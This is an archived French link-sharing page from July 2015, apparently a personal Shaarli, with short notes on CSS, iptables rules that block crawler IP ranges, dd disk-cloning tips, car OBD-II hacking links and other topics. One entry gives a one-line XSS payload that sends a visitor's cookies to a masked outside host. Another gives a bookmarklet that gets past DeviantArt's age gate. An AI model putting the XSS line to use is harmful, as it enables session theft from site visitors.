PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links

⇐ retour index

[CSS] Note centrer une image dans un bloc - Le Hollandais Volant

vendredi 31 juillet 2015 à 20:57
Merci
Toujours bon à garder sous le coude.
"""
#container {
   max-height: 100%;
}

#container img {
   /* Keeps image from going outside the screen */
   max-height: 100%;
   max-width: 100%;
   /* Keeps image from beeing distorted */
   height: auto;
   width: auto;
   /* centering horizontally AND vertically */
   /* 50% of container */
   position: relative;
   top: 50%;
   left: 50%;
   /* 50% of image */
   transform: translate(-50%,-50%);
}
"""
demo : http://lehollandaisvolant.net/tout/examples/center/
(Permalink)

Windows 10 (JPEG Image, 1271 × 5437 pixels) - Scaled (17%)

vendredi 31 juillet 2015 à 16:44
LOL
Bon courage les windowsiens ^_^
(Permalink)

uncensor_deviantart

vendredi 31 juillet 2015 à 14:07
J'ai mis à jour mon marque-page qui sert à supprimer la censure -18 sur deviantart.com
Maintenant le simple cookie "agegate_state=1" permet de lever cette censure.
Donc si vous avec les cookies actifs, en marque-page vous pouvez utiliser le code suivant :
javascript:(function(){document.cookie="agegate_state=1";window.location.reload();})();

Si vous avez désactivé les cookies, le code suivant peut fonctionner avec des images postés avant 2015 :
https://raw.githubusercontent.com/Oros42/uncensor_deviantart/master/uncensor_deviantart.js
(Permalink)

Blogotext or not(Blogotext) - Shaarlo

jeudi 30 juillet 2015 à 11:31
Oui, je suis pour.
Mais comme dit Kevin (https://www.mypersonnaldata.eu/shaarli/?L8Z_CA), cela remet en question le nom de shaarli.fr.
(Permalink)

Anticiper une situation d'urgence | Portail interministériel de prévention des Risques majeurs

jeudi 30 juillet 2015 à 10:26
Choses à savoir et à préparer pour faire face à des situations d'urgences.
http://www.risques.gouv.fr/risques-majeurs/anticiper-une-situation-durgence-1/construire-son-plan-durgence
http://www.risques.gouv.fr/risques-majeurs/anticiper-une-situation-durgence-1/avoir-un-kit-durgence
(Permalink)

Orange bloque T411 par DNS menteur

mardi 28 juillet 2015 à 16:06
J'en avais déjà parlé ici https://www.ecirtam.net/links/?to05bw
Host : www.t411.io
IP : 108.162.203.254 (cloudflare)
(Permalink)

Klaire Fait Grr - Timeline Photos - Les liens de Kevin Merigot - Les petits liens d'Alda - Les liens de Kevin Merigot

mardi 28 juillet 2015 à 12:00
"Mais bref, passé cette digression, oui le végétarisme est une choix politique"
NON

D'après le dico http://www.larousse.fr/dictionnaires/francais/politique/62189 la politique, c'est lié à l'organisation d'un État.
Là,ça n'a rien à voir.
Je suis végétarien et ce c'est pas un choix politique.
Je n'aime pas la viande. Ça me donne plus l'envie de vomir que manger.
C'est tout.
(Permalink)

Learn X in Y Minutes: Scenic Programming Language Tours

vendredi 24 juillet 2015 à 12:35
Pour apprendre rapidement un langage.
via eijebong
(Permalink)

ADSL-BC • Consulter le sujet - Flasher un BIOS sous Linux :-)

vendredi 24 juillet 2015 à 08:49
via https://www.davidsound.ovh/Shaarli/?aICLnQ
(Permalink)

16 commands to check hardware information on Linux

jeudi 23 juillet 2015 à 16:20
via https://www.shaarli.fr/my/georgesa/?iKO8cw
(Permalink)

Exemple de règles iptables

jeudi 23 juillet 2015 à 14:46
#!/bin/bash
## Script iptables by BeAvEr
## update by Oros
## Règles iptables.
## http://doc.ubuntu-fr.org/iptables
## On flush iptables.
iptables -F
## On supprime toutes les chaînes utilisateurs.
iptables -X
## On drop tout le trafic entrant.
iptables -P INPUT DROP
## On drop tout le trafic sortant.
iptables -P OUTPUT DROP
## On drop le forward.
iptables -P FORWARD DROP
## On drop les scans XMAS et NULL.
iptables -A INPUT -p tcp --tcp-flags FIN,URG,PSH FIN,URG,PSH -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
## Dropper silencieusement tous les paquets broadcastés.
iptables -A INPUT -m pkttype --pkt-type broadcast -j DROP
## Permettre à une connexion ouverte de recevoir du trafic en entrée.
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
## Permettre à une connexion ouverte de recevoir du trafic en sortie.
iptables -A OUTPUT -m state ! --state INVALID -j ACCEPT
## On accepte la boucle locale en entrée.
iptables -I INPUT -i lo -j ACCEPT
## On log les paquets en entrée.
iptables -A INPUT -j LOG
## On log les paquets forward.
iptables -A FORWARD -j LOG
iptables -A INPUT -p tcp -i eth0 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -i eth0 --dport 443 -j ACCEPT
iptables -A INPUT -p tcp -i eth0 --dport ssh -j ACCEPT

#TMG
iptables -A INPUT -m iprange --src-range 85.159.236.253-85.159.236.254 -j DROP
iptables -A INPUT -m iprange --src-range 85.159.232.81-85.159.232.83 -j DROP
iptables -A INPUT -m iprange --src-range 193.107.240.1-193.107.240.4 -j DROP
iptables -I INPUT -s 82.138.81.211 -j DROP

#baidu
iptables -A INPUT -m iprange --src-range 119.63.192.0-119.63.192.255 -j DROP
iptables -A INPUT -m iprange --src-range 123.125.71.0-123.125.71.255 -j DROP
iptables -A INPUT -m iprange --src-range 180.76.15.0-180.76.15.255 -j DROP
iptables -A INPUT -m iprange --src-range 220.181.108.0-220.181.108.255 -j DROP

#google
iptables -A INPUT -m iprange --src-range 64.233.160.0-64.233.191.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.102.0.0-66.102.15.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.249.64.0-66.249.95.255 -j DROP
iptables -A INPUT -m iprange --src-range 72.14.192.0-72.14.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 74.125.0.0-74.125.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 209.85.128.0-209.85.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 216.239.32.0-216.239.63.255 -j DROP

#MSN/Live
iptables -A INPUT -m iprange --src-range 64.4.0.0-64.4.63.255 -j DROP
iptables -A INPUT -m iprange --src-range 65.52.0.0-65.55.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 131.253.21.0-131.253.47.255 -j DROP
iptables -A INPUT -m iprange --src-range 157.54.0.0-157.60.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 207.46.0.0-207.46.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 207.68.128.0-207.68.207.255 -j DROP

#Yahoo
iptables -A INPUT -m iprange --src-range 8.12.144.0-8.12.144.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.196.64.0-66.196.127.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.228.160.0-66.228.191.255 -j DROP
iptables -A INPUT -m iprange --src-range 67.195.0.0-67.195.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 68.142.192.0-68.142.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 72.30.0.0-72.30.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 74.6.0.0-74.6.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 98.136.0.0-98.139.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 202.160.176.0-202.160.191.255 -j DROP
iptables -A INPUT -m iprange --src-range 209.191.64.0-209.191.127.255 -j DROP

exit 0
(Permalink)

Bug in OpenSSH Opens Linux Machines to Password Cracking Attack

jeudi 23 juillet 2015 à 14:31
(Permalink)

Script utilisable en XSS - stuper

jeudi 23 juillet 2015 à 12:43
Une autre version plus simple :

<script>document.body.insertAdjacentHTML('beforeEnd', "<img src='https://xxxxxx.xxxxxxx/hack.php?cookie="+encodeURIComponent(document.cookie)+"'>");</script>;
(Permalink)

Baidu, tu fais chier avec ton spider

jeudi 23 juillet 2015 à 11:59
Baidu ne suis pas les consignes du robots.txt !
Bon comme il ne suit pas les directives, il se prend des bans ^_^
Sa plage d'IP : 180.76.15.* (baiduspider-180-76-15-*.crawl.baidu.com)
(Permalink)

http://www.cs.toronto.edu/~graves/handwriting.cgi?text=salut+le+monde&style=&bias=0.4&samples=3

jeudi 23 juillet 2015 à 09:30
Un réseau neuronal pour générer des textes écris à la main :-)
En gros, tu donnes donne un texte et il génère une image du texte comme si c'était écris à la main.
(Permalink)

Car hacking

mercredi 22 juillet 2015 à 18:38
En référence à ça :
https://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/
http://www.metronews.fr/high-tech/des-experts-en-securite-prennent-le-controle-d-une-jeep-a-distance/mogv!VezNWjj2mhvU/
http://www.numerama.com/magazine/33758-500-000-voitures-piratables-et-controlables-a-distance-des-aujourd-hui.html

Voici quelques liens sur l'utilisation du port OBD-II pour communiquer avec l'ordinateur de bord des voitures :

Matériel nécessaire :
dongle ELM-327 USB (~12$)

Documentation :
https://en.wikipedia.org/wiki/OBD-II
https://en.wikipedia.org/wiki/OBD-II_PIDs
http://hackaday.com/2013/10/29/can-hacking-protocols/
http://hackaday.com/2013/10/21/can-hacking-introductions/
http://hackaday.com/2013/10/22/can-hacking-the-in-vehicle-network/

Programmes existants :
https://github.com/AustinMurphy/OBD2-Scantool
https://github.com/peterh/pyobd
https://pypi.python.org/pypi/obd/0.1.0

Exemples d'utilisation :
http://x0r.fr/blog/27
http://www.cowfishstudios.com/blog/obd-pitft-display-car-diagnostics-obd-ii-data-on-adafruits-pitft-touchscreen-display-for-raspberry-pi
http://www.instructables.com/id/OBD-Pi/
http://blog.brianhemeryck.me/how-to-interface-with-your-cars-ecu-through-obd2-and-python/
http://hackaday.com/2013/11/05/can-hacking-the-hardware/
http://www.caranddriver.com/features/can-your-car-be-hacked-feature
http://theksmith.com/software/hack-vehicle-bus-cheap-easy-part-1/
(Permalink)

INFO Un exemple d autocensure : 0x0ff - Streisand.fr - Liens en vrac de SimonLefort

mercredi 22 juillet 2015 à 15:23
Archive : https://web.archive.org/web/20150331101955/http://www.0x0ff.info/
Compte github : https://github.com/0x0ff
http://streisand.fr/article2/un-exemple-d-auto-censure
(Permalink)

Hackers Remotely Kill a Jeep on the Highway—With Me in It | WIRED

mercredi 22 juillet 2015 à 10:02
via http://sebsauvage.net/links/?n2QwLw
(Permalink)

monitoring - How do you monitor the progress of dd? - Ask Ubuntu

mercredi 22 juillet 2015 à 08:54
Je prends note :
pkill -USR1 ^dd
ou
apt-get install pv
dd if=/dev/sda | pv | dd of=/dev/sdc
ou
(pv -n /dev/sda | dd of=/dev/sdb bs=128M conv=notrunc,noerror) 2>&1 | dialog --gauge "Running dd command (cloning), please wait..." 10 70 0
via https://fralef.me/links/?gArOkQ
(Permalink)

Pourquoi garder vos sachets de thé usagés ? Des utilisations surprenantes

mardi 21 juillet 2015 à 20:45
via http://www.petitetremalfaisant.eu/shaarli/?sxaY_g
(Permalink)